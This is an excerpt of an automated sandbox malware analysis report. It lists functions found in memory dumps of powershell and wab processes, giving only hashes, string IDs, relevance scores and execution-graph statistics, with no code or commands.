                                                                                • Instruction ID: 774bd2914f16ba50645ea343ed7d3c50b6d36984cfb24f4dc76b04a9f84b6d73
                                                                                • Opcode Fuzzy Hash: aaf63cc2bfdc63f113efcab2d8d38e4f69aab9a7d39fecbf358231ce4de085b7
                                                                                • Instruction Fuzzy Hash: 20E188B27043268FC7259B289900766FBB1BFD6324F2680ABE445CF255CE31E857D7A1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07D25300 Relevance: 12.9, Strings: 10, Instructions: 400COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                • API String ID: 0-3512890053
                                                                                • Opcode ID: 3376861741dc3a9d94007f02ee05a4868397e2766eb120f51f4bd8ce3361c115
                                                                                • Instruction ID: 42ec2f8c50d1eb5269b55fc45e2766a01eca0df6eca2c2c819a7917183c2a473
                                                                                • Opcode Fuzzy Hash: 3376861741dc3a9d94007f02ee05a4868397e2766eb120f51f4bd8ce3361c115
                                                                                • Instruction Fuzzy Hash: C8C15CB17042268FCB245E39A400A7AF7E2AFD1219F2484AAE447CB355DF32C963D791
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07D21C98 Relevance: 12.8, Strings: 10, Instructions: 270COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$ek$kl$kl
                                                                                • API String ID: 0-2737449875
                                                                                • Opcode ID: 76d8197a177954d97fa504e86b95c3dbf2d25110d4187f55f2644b683704951a
                                                                                • Instruction ID: d1546dd810833d58515463a69f5c57b2261dd5d29c9cad2dca7bb7ba2a36bdde
                                                                                • Opcode Fuzzy Hash: 76d8197a177954d97fa504e86b95c3dbf2d25110d4187f55f2644b683704951a
                                                                                • Instruction Fuzzy Hash: 2A919AB270426A9FC7248B69980066AFBA2AFE1624F18C06BD554CF361DF33C857D391
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07D24D30 Relevance: 10.2, Strings: 8, Instructions: 200COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
                                                                                • API String ID: 0-3865595929
                                                                                • Opcode ID: 2385edb807617b3cdc9c2c8f623efe5360aae5abf3de69b9c11afb32b8e43500
                                                                                • Instruction ID: 289171b29d3c167dcdfe2581f876b86848330c223944e3561a668f7380783daf
                                                                                • Opcode Fuzzy Hash: 2385edb807617b3cdc9c2c8f623efe5360aae5abf3de69b9c11afb32b8e43500
                                                                                • Instruction Fuzzy Hash: 43612971B04265AFDB288F65C8047AAFBA2AF95328F14C45AEC158F295CB31CC47D791
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07D2C2B8 Relevance: 9.0, Strings: 7, Instructions: 284COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q
                                                                                • API String ID: 0-3199432138
                                                                                • Opcode ID: 9253dadfe7955a7e4084a1ebc00d783e1a0f432a990c9f78e2aa2f0005185ff6
                                                                                • Instruction ID: 627ca485960081e5183611f433fc683f6b6d7c58110724e997e5275be550c832
                                                                                • Opcode Fuzzy Hash: 9253dadfe7955a7e4084a1ebc00d783e1a0f432a990c9f78e2aa2f0005185ff6
                                                                                • Instruction Fuzzy Hash: 15915AB1B24226CFCB254F2988006BFFBA2AF95219F14446AC449CB255DF35CC57D772
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07D25BC0 Relevance: 9.0, Strings: 7, Instructions: 282COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q
                                                                                • API String ID: 0-3199432138
                                                                                • Opcode ID: 2effe400bbe98aaabec852d3304b4a1473e911f08373371753c1eced94444686
                                                                                • Instruction ID: e4f8dbc41fe67f789f9da41403750a34c1d75cc0598de3d45aef715c24685f76
                                                                                • Opcode Fuzzy Hash: 2effe400bbe98aaabec852d3304b4a1473e911f08373371753c1eced94444686
                                                                                • Instruction Fuzzy Hash: DE916DB1B042269FCB148B28E404E6AF7E1EF91214F1884EAD457CF265DF31C967E7A1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07D24718 Relevance: 7.9, Strings: 6, Instructions: 384COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q
                                                                                • API String ID: 0-445857065
                                                                                • Opcode ID: dd492588c9f0eb5de054d3d953af4e5ad2aa2c7e6f91c443f53d93d92098ec97
                                                                                • Instruction ID: 93568dea9e0b0dbe87b95e0392d36d4b6b5c6f384aeadd1837ed257df99d2c74
                                                                                • Opcode Fuzzy Hash: dd492588c9f0eb5de054d3d953af4e5ad2aa2c7e6f91c443f53d93d92098ec97
                                                                                • Instruction Fuzzy Hash: 56C157B2B042A58FCB158B68950066AFBE2AFD2218F1480AED945CF355DF32CC97D7D1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07D2AE80 Relevance: 7.6, Strings: 6, Instructions: 139COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                • API String ID: 0-2392861976
                                                                                • Opcode ID: 3978aba5da91c6172de419666d8b97d187d9ccd50f402366cb3aca5871ee8683
                                                                                • Instruction ID: e1b3f871848de403f06d7cf811fe68eefae6dad19e65b495046a5e9b9afac18f
                                                                                • Opcode Fuzzy Hash: 3978aba5da91c6172de419666d8b97d187d9ccd50f402366cb3aca5871ee8683
                                                                                • Instruction Fuzzy Hash: 24414AF1B043268FCB254A6988406A6F7F1EFE5214B14C4ABEC558F246DA35C84BD3A1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07D26380 Relevance: 7.6, Strings: 6, Instructions: 125COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 84sl$84sl$tP^q$tP^q$$^q$$^q
                                                                                • API String ID: 0-865178360
                                                                                • Opcode ID: 534d5a894615ba15ffa4e3575498d7229fa87fc70778fb437ae5d6403a9abf58
                                                                                • Instruction ID: 670bcf036ec298849cec1781346079f496f06d7dafe126a1bdac4d46f967b341
                                                                                • Opcode Fuzzy Hash: 534d5a894615ba15ffa4e3575498d7229fa87fc70778fb437ae5d6403a9abf58
                                                                                • Instruction Fuzzy Hash: 5C416CB1B043655FC3259B68981466AFFA2AFD5614B18849FE484DFB5ACA31CC07C3E1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07D26E78 Relevance: 6.4, Strings: 5, Instructions: 133COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                • API String ID: 0-3272787073
                                                                                • Opcode ID: a4f1eb26569031b64c1aae567eaa007664252a9a51c647596ce8816df2b92b91
                                                                                • Instruction ID: b6ed0f9fe6f732533e9cb00819c6956d32d52ff52f32439afa1dcff7eac6d5f0
                                                                                • Opcode Fuzzy Hash: a4f1eb26569031b64c1aae567eaa007664252a9a51c647596ce8816df2b92b91
                                                                                • Instruction Fuzzy Hash: 1E413AB1B04326DFCF258F29C80066AFBE1AFD5218F24846AD454CBA45DB32C85BD7A1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07D24D15 Relevance: 6.4, Strings: 5, Instructions: 125COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'^q$tP^q$$^q$$^q$$^q
                                                                                • API String ID: 0-3997570045
                                                                                • Opcode ID: fe559fd8f15265021f4c427e9675ecdb4f986e44bb535acc33cfa82fee4b5ba9
                                                                                • Instruction ID: f3059717fd0f99cd524edaddcd5e9ffc9b974e35e2e388edabe5cdaaf5c5ff1f
                                                                                • Opcode Fuzzy Hash: fe559fd8f15265021f4c427e9675ecdb4f986e44bb535acc33cfa82fee4b5ba9
                                                                                • Instruction Fuzzy Hash: B94109F1B042A5EFEB248E14C544BA5F7A1EFA5728F1881A6ED148F295CB31CC43DB51
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07D200F0 Relevance: 6.3, Strings: 5, Instructions: 71COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $^q$$^q$$^q$kl$kl
                                                                                • API String ID: 0-4246339534
                                                                                • Opcode ID: 89bdff59a2a8842655469ddebd2868d4760218936991c304315d0afeef294702
                                                                                • Instruction ID: bb747a318649e36eb90c7760ba9be2575eac1c2aa39a6763a52cf4616ed2dc9f
                                                                                • Opcode Fuzzy Hash: 89bdff59a2a8842655469ddebd2868d4760218936991c304315d0afeef294702
                                                                                • Instruction Fuzzy Hash: 6E113B713003269BEB39491A9804B27F79BABE1768F24C42AE489CB354ED32C487D370
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07D22E38 Relevance: 5.4, Strings: 4, Instructions: 414COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                • API String ID: 0-1420252700
                                                                                • Opcode ID: 848dff16cb28326ac7f89efe784047523232f2dbd081bb8f84457bd6e33aeac6
                                                                                • Instruction ID: f0dda20961c087ecf8eb3957bea494921aab8125c74aaa39f645c2c498e54b16
                                                                                • Opcode Fuzzy Hash: 848dff16cb28326ac7f89efe784047523232f2dbd081bb8f84457bd6e33aeac6
                                                                                • Instruction Fuzzy Hash: 7ED1A8B1B043258FCB158B69880076AFBA2AFD2314F1480BBE545CF295DF36D857D3A1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07D29BC0 Relevance: 5.3, Strings: 4, Instructions: 253COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (ful$(ful$(ful$(ful
                                                                                • API String ID: 0-100295639
                                                                                • Opcode ID: 80e3221c46798021c53f175db7a6f4bfb27463d926db550d9547c47a8bd31a9d
                                                                                • Instruction ID: 531184e53d2d772fcaf09070090cc06ee3de5d2772b664d64cbd2a8e70a8329f
                                                                                • Opcode Fuzzy Hash: 80e3221c46798021c53f175db7a6f4bfb27463d926db550d9547c47a8bd31a9d
                                                                                • Instruction Fuzzy Hash: F8A18CF0A01225DBCB24CF54C560A6AF7B2BF99318F14842AD85A7B754CB32F843EB51
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07D29BBF Relevance: 5.3, Strings: 4, Instructions: 251COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (ful$(ful$(ful$(ful
                                                                                • API String ID: 0-100295639
                                                                                • Opcode ID: 34cc0536db8ac5968ca492652ffe20a992e80a93cf28445dc4e5fe1d83ec82da
                                                                                • Instruction ID: 2b1520827bb4bbe0dbe6bbf84c428dae02c059940c8b61c59fa6c5838ba876a0
                                                                                • Opcode Fuzzy Hash: 34cc0536db8ac5968ca492652ffe20a992e80a93cf28445dc4e5fe1d83ec82da
                                                                                • Instruction Fuzzy Hash: 5BA18CF0A01225DBCB24CF54C560AAAF7B2BF95318F14842AD85A7B754CB32F843EB51
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07D21FA8 Relevance: 5.2, Strings: 4, Instructions: 238COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'^q$4'^q$tP^q$tP^q
                                                                                • API String ID: 0-3859475322
                                                                                • Opcode ID: bfab0e0e9be7daf295c6ed1df3af49af0cdbdff31d4512f0d77348d67ec9817b
                                                                                • Instruction ID: 6272959e8cca210153ca1801e4c791dc16afac8a053752455dbc6dc37490d545
                                                                                • Opcode Fuzzy Hash: bfab0e0e9be7daf295c6ed1df3af49af0cdbdff31d4512f0d77348d67ec9817b
                                                                                • Instruction Fuzzy Hash: 4E717FB2B043258FC7218B688D057ABFBF2BF91314F15C06AE6448F255DA32E857D3A1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07D27738 Relevance: 5.2, Strings: 4, Instructions: 196COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 84sl$84sl$tP^q$tP^q
                                                                                • API String ID: 0-3511852971
                                                                                • Opcode ID: 522efdc424c72fecd28c7a3a3f41e7f6e547de3654d8436c7ea6cd6ae674115c
                                                                                • Instruction ID: 827cccca223151940aeb2b4a3f264966006301553f77a86bc3be03fc277245d4
                                                                                • Opcode Fuzzy Hash: 522efdc424c72fecd28c7a3a3f41e7f6e547de3654d8436c7ea6cd6ae674115c
                                                                                • Instruction Fuzzy Hash: 525159B1B002269FC7249F79C850ABAFBE2AF90624F14846AD644CF391DE31DC43D7A1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07D2A600 Relevance: 5.2, Strings: 4, Instructions: 192COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (ful$(ful$(ful$(ful
                                                                                • API String ID: 0-100295639
                                                                                • Opcode ID: 02678bc9944d8865c1f769c33585c69a57f8eacf1769b7b0042635d019d7ee4d
                                                                                • Instruction ID: 3d2fe90878bc8aeccc1dbc89070607b264b4d2b537997ba19fc521a4f21b2fc9
                                                                                • Opcode Fuzzy Hash: 02678bc9944d8865c1f769c33585c69a57f8eacf1769b7b0042635d019d7ee4d
                                                                                • Instruction Fuzzy Hash: 677187B0A00215DFCB14DF68D951AAAFBB2EF99318F14C069D805AB755CB32EC43DB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07D223C8 Relevance: 5.2, Strings: 4, Instructions: 173COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ,Sul$,Sul$p5ek$xSul
                                                                                • API String ID: 0-4179798329
                                                                                • Opcode ID: cf83a56cf776bac3fd72d7ae21d0c277f2d720a78f29654afee02461f5ba768e
                                                                                • Instruction ID: b7f525b6cd9a54b333ea614b16f709b98f1595ab677d9f823e3bc90c04cd8f9d
                                                                                • Opcode Fuzzy Hash: cf83a56cf776bac3fd72d7ae21d0c277f2d720a78f29654afee02461f5ba768e
                                                                                • Instruction Fuzzy Hash: B3515AB27043268FC7218B29980076AFBA2BFF6329F15C06AF545CB251DA31E857D791
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07D257B0 Relevance: 5.1, Strings: 4, Instructions: 104COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $^q$$^q$$^q$$^q
                                                                                • API String ID: 0-2125118731
                                                                                • Opcode ID: a1c8b01ec164cb5a32a5eec74b9db17dd08d333e6f749e05608f58bd3c5d1541
                                                                                • Instruction ID: fc0a1fef411a2d73f0d164dfaccb04fad13076581275c3da8a9a3d8a4bff5f61
                                                                                • Opcode Fuzzy Hash: a1c8b01ec164cb5a32a5eec74b9db17dd08d333e6f749e05608f58bd3c5d1541
                                                                                • Instruction Fuzzy Hash: 3431A9F17003266BD7281979AC01F3AF7864BD0B09F14842AAA43CF395DDB6DD5793A2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07D20CB8 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $^q$$^q$$^q$$^q
                                                                                • API String ID: 0-2125118731
                                                                                • Opcode ID: 5f41a5142d8126bb9ced922dc25372822b5113c57e5accf9a723f7507539ce21
                                                                                • Instruction ID: fc68a5402652fe198e32c8150380c223cf505e2468811badcc9b1eefc751e36b
                                                                                • Opcode Fuzzy Hash: 5f41a5142d8126bb9ced922dc25372822b5113c57e5accf9a723f7507539ce21
                                                                                • Instruction Fuzzy Hash: B02188F130432A5BD738197A9804B27F7D6ABD0718F28882AA849CF795CD72D843A361
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07D2AE7F Relevance: 5.1, Strings: 4, Instructions: 68COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $^q$$^q$$^q$$^q
                                                                                • API String ID: 0-2125118731
                                                                                • Opcode ID: d0ece6a5cd555da129059c27971fb24a69deb3ea054a694fcf91e55639af00bf
                                                                                • Instruction ID: 69bb9aca0dcfdd4185b069038784c0afb575cd221158933cd1d7521d03adab96
                                                                                • Opcode Fuzzy Hash: d0ece6a5cd555da129059c27971fb24a69deb3ea054a694fcf91e55639af00bf
                                                                                • Instruction Fuzzy Hash: 5A11CDF5A0032BEBCB248E558540666F7B1EBE5A18F19C4ABEC448B205DB39C447E7A1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 07D217BF Relevance: 5.0, Strings: 4, Instructions: 35COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2308145274.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7d20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'^q$4'^q$$^q$$^q
                                                                                • API String ID: 0-2049395529
                                                                                • Opcode ID: ffd86e5593e44c6a50d8d417fde1345781f7af48eefe3eeba0a57314038cf23f
                                                                                • Instruction ID: 5afb3b2d26b52ab5a5e0e5a7233ebdd4d8b779d454eff1d1cbe2bf9d189a186a
                                                                                • Opcode Fuzzy Hash: ffd86e5593e44c6a50d8d417fde1345781f7af48eefe3eeba0a57314038cf23f
                                                                                • Instruction Fuzzy Hash: 73F0A0B1F4022EAB863C155D2824676C6E7ABD1E64725842FD1429F348CE63CD8B43D7
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Execution Graph

                                                                                Execution Coverage:73.1%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:100%
                                                                                Total number of Nodes:5
                                                                                Total number of Limit Nodes:1

                                                                                Callgraph

                                                                                • Executed
                                                                                • Not Executed
                                                                                • Opacity -> Relevance
                                                                                • Disassembly available
                                                                                callgraph 0 Function_0495404F 1 Function_04953969

                                                                                Executed Functions

                                                                                Function 0495404F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64sleeplibraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2882139454.00000000040F5000.00000040.00000400.00020000.00000000.sdmp, Offset: 040F5000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_40f5000_wab.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeSleepThunk
                                                                                • String ID: YX1
                                                                                • API String ID: 145592009-3213892427
                                                                                • Opcode ID: 8dfa6133743a36b51e8658c3dd328bde0fd5126e80885fc843e86c439f8c39b3
                                                                                • Instruction ID: c00894f8f51cf3a8221d910e87ac3c14df2b2f53b4397c8dccca2b7238180ec5
                                                                                • Opcode Fuzzy Hash: 8dfa6133743a36b51e8658c3dd328bde0fd5126e80885fc843e86c439f8c39b3
                                                                                • Instruction Fuzzy Hash: F8218CB15003429FEB609F79889CB8A77A5AF083E5F758569ED418B0B6D3B4C9C4CB12
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%